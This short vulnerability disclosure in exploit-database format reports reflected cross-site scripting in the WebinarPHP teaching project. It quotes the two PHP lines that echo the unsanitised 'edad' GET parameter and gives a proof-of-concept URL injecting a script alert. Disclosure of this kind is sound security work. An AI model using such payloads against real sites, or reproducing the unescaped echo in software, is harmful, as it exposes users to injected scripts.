# Exploit Title: WebinarPHP Script Cross-Site-Scripting
# Date: 06.24.2018
# Exploit Author: abolfazl hajizade
# Software Link : https://github.com/ComunidadDePHP/WebinarPHP
# Tested on: Windows-Linux
# Google Dork: N/A
=====================================
Vulnerable Page:
/02-php-profesional-con-mysql/clase-03-4may2018-recibir.php
=====================================
Vulnerable Source:
line 7: echo "GET: " . $_GET['edad'] . "<br>";
line 14: echo "2 GET: " . $_GET['edad'] . "<br>";
=====================================
POC:
http://localhost/WebinarPHP/02-php-profesional-con-mysql/clase-03-4may2018-recibir.php?edad=<script>alert('ultrasec')</script>
=====================================
WebSite : UltraSec.Org
Channel : @UltraSecurity
Email : zeroday1010@gmail.com
Special Thanks : ashkan moghaddas , MrQadir , Milad Ranjbar